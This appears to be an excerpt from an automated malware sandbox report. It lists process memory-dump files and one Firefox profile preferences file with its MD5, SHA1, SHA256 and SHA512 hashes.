memory/4396-1033-0x00000000005F0000-0x0000000000A95000-memory.dmp

C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\iz0mcgq4.default-release\prefs-1.js

MD5 18b64bcd3e30b84f0fb25d1dc5eeeb3c
SHA1 f52fe6c44c4b09213c7609ac4c690bae0e609aae
SHA256 b5fee9fd5625d6afdced4b98247bd68f6421b3666e392b67f4d5648e402e8623
SHA512 0db5ccf874e85f0bda8a7b591f5ce620a3c91c52adb00065e12a41b6cbbc5d39c63d374b14f44797c80533d4a8e685a974801f42b9f784ee6707f864169d4ba9

memory/1744-3054-0x0000000000400000-0x0000000000C7E000-memory.dmp

memory/4396-3671-0x00000000005F0000-0x0000000000A95000-memory.dmp

memory/1744-3676-0x0000000000400000-0x0000000000C7E000-memory.dmp

memory/4396-3677-0x00000000005F0000-0x0000000000A95000-memory.dmp

memory/1744-3680-0x0000000000400000-0x0000000000C7E000-memory.dmp

memory/4396-3684-0x00000000005F0000-0x0000000000A95000-memory.dmp

memory/1744-3685-0x0000000000400000-0x0000000000C7E000-memory.dmp

memory/4396-3687-0x00000000005F0000-0x0000000000A95000-memory.dmp

memory/3040-3689-0x00000000005F0000-0x0000000000A95000-memory.dmp

memory/1744-3690-0x0000000000400000-0x0000000000C7E000-memory.dmp

memory/4396-3691-0x00000000005F0000-0x0000000000A95000-memory.dmp

memory/1744-3692-0x0000000000400000-0x0000000000C7E000-memory.dmp

memory/4396-3693-0x00000000005F0000-0x0000000000A95000-memory.dmp

memory/1744-3694-0x0000000000400000-0x0000000000C7E000-memory.dmp